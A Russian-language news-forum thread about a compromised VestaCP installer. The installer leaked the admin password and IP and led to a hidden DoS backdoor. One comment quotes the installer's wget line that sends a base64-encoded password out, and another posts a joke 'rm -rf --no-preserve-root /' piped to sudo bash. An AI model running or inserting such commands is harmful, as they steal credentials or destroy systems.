Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
Сообщение от opennews (??), 18-Окт-18, 13:47
В установочном скрипте панели управления хостингом VestaCP выявлен (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста. Индикатором утечки данных является наличие в логе запросов вида "http://vestacp.com/test/?ip=x.x.x.x". Если данная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл /usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]". В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20 (https://forum.vestacp.com/viewtopic.php?f=25&p=68895#p68895). Проблемы устранены (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) в выпуске 0.9.8-23 (https://github.com/serghey-rodin/vesta/commit/cde42691701667...). Дополнительные подробности пока не сообщаются. URL: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1... Новость: https://www.opennet.me/opennews/art.shtml?num=49457
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+16 +/–
Сообщение от Аноним (1), 18-Окт-18, 13:47
> штатную систему отправки телеметрии Ух. Хорошо зашли.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	7. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+5 +/–
	Сообщение от А (??), 18-Окт-18, 14:51
	> которая в ответ на внешний запрос осуществляет вывод названия дистрибутива ха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию  модернизировали до телеуправления.
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

	10. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–20 +/–
	Сообщение от Аноним (10), 18-Окт-18, 16:26
	А ты как собираешься без запросов спросить телеметрию, умник?
	Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

	11. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+15 +/–
	Сообщение от Аноним (11), 18-Окт-18, 16:49
	А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.
	Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

	17. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от Himik (ok), 18-Окт-18, 18:56
	Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.
	Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

	22. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Аноним (22), 18-Окт-18, 23:32
	Ага, рабочая станция значит, так? А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...
	Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

	19. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Ирокез (?), 18-Окт-18, 19:58
	Ш10 отправляет ваши данные в микрософт говорили они.
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

	25. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от Аноним (-), 19-Окт-18, 08:26
	Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.
	Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

2. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–1 +/–
Сообщение от mikhailnov (ok), 18-Окт-18, 14:07
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	3. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+5 +/–
	Сообщение от Аноним (3), 18-Окт-18, 14:29
	Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	31. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–2 +/–
	Сообщение от Аноним (31), 19-Окт-18, 16:42
	> введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией". Наш ответ: https://hackage.haskell.org/package/sproxy2
	Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

	8. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от Аноним (8), 18-Окт-18, 15:06
	Как это спасёт от "бэкдора в установочном скрипте"? Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	9. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+9 +/–
	Сообщение от scorry (ok), 18-Окт-18, 15:47
	«поставил себе вирус. закрыл файрволлом. я хаккир.»
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	13. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+7 +/–
	Сообщение от th3m3 (ok), 18-Окт-18, 16:59
	На что только не пойдут, лишь бы консолью не пользоваться.
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	15. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+8 +/–
	Сообщение от Аноним (15), 18-Окт-18, 18:13
	Ваш комментарий огорчает молодых специалистов.
	Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

4. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
Сообщение от CHERTS (ok), 18-Окт-18, 14:37
Ох и рeшето... других слов просто нет.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–4 +/–
Сообщение от Аноним (5), 18-Окт-18, 14:39
Давно знал что майкрософты ужасное по делают
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+3 +/–
Сообщение от th3m3 (ok), 18-Окт-18, 16:53
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	14. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+7 +/–
	Сообщение от FedeX (ok), 18-Окт-18, 17:09
	Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".
	Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

	18. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+2 +/–
	Сообщение от Аноним (18), 18-Окт-18, 19:25
	А потому служат Нурглу и Слаанеш сразу?
	Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

16. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
Сообщение от Аноним (16), 18-Окт-18, 18:36
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили. codename="$codename:$(echo $vpass:$servername | base64)" wget vestacp.com/notify/?$codename -O /dev/null -q https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424... https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c... а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	20. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+2 +/–
	Сообщение от Борщдрайвен бигдата (?), 18-Окт-18, 20:41
	> сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили Но зачем?!
	Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

	21. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+3 +/–
	Сообщение от Типа хомячок (?), 18-Окт-18, 23:04
	'Cause they can, очевидно же.
	Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

	23. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от KonstantinB (??), 19-Окт-18, 06:26
	Шикарно. И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)
	Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

	28. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от нах (?), 19-Окт-18, 10:37
	хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу. Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)
	Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

	37. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от KonstantinB (ok), 20-Окт-18, 04:03
	Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.
	Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

	39. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–1 +/–
	Сообщение от пох (?), 20-Окт-18, 10:46
	> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет > 5 это все никому, кроме пожилых сеошников, не надо. угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.
	Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

	40. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–1 +/–
	Сообщение от Vitaliy Blats (?), 20-Окт-18, 12:40
	> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет > 5 это все никому, кроме пожилых сеошников, не надо. Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели. Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))
	Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

	41. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от пох (?), 20-Окт-18, 19:35
	> мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :)) на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить. Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.
	Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

24. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
Сообщение от odd.mean (ok), 19-Окт-18, 07:38
Хорошую вещь "CP" не назовут.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	26. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Аноним (26), 19-Окт-18, 09:41
	И альта-вистой тоже....
	Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

	44. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Аноним (44), 21-Окт-18, 06:23
	а CP/M ?
	Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

	45. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от odd.mean (ok), 21-Окт-18, 08:40
	Ну разве что CP/M. Да и то...
	Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

27. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–2 +/–
Сообщение от Аноним (26), 19-Окт-18, 09:44
Есть Ajenti не вижу смысла в существовании этого плохо-кода.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	30. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от Vitaliy Blats (?), 19-Окт-18, 12:17
	> Есть Ajenti не вижу смысла в существовании этого плохо-кода. Есть %software_name1% не вижу смысла в существовании этого %software_name2%.
	Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

32. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
Сообщение от Аноним (31), 19-Окт-18, 21:06
Fuck me https://github.com/serghey-rodin/vesta: ``` Download the installation script: curl -O http://vestacp.com/pub/vst-install.sh Then run it: bash vst-install.sh ```
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	33. "Злоумышленники добавили вредоносный код в скрипт установки х..."	–2 +/–
	Сообщение от пох (?), 19-Окт-18, 21:46
	прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?
	Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

	34. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+1 +/–
	Сообщение от Грусть (?), 19-Окт-18, 22:59
	Вам следует настроить свой камертон на curl http://...
	Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

	42. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от пох (?), 20-Окт-18, 19:39
	ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?
	Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

	35. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Аноним (35), 19-Окт-18, 23:16
	echo "rm -rf --no-preserve-root /" | sudo bash
	Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

	36. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от Аноним (36), 20-Окт-18, 01:43
	curl2bash™
	Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

	38. "Злоумышленники добавили вредоносный код в скрипт установки х..."	+/–
	Сообщение от annual slayer (?), 20-Окт-18, 06:45
	есть уже `curl --rootme`
	Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема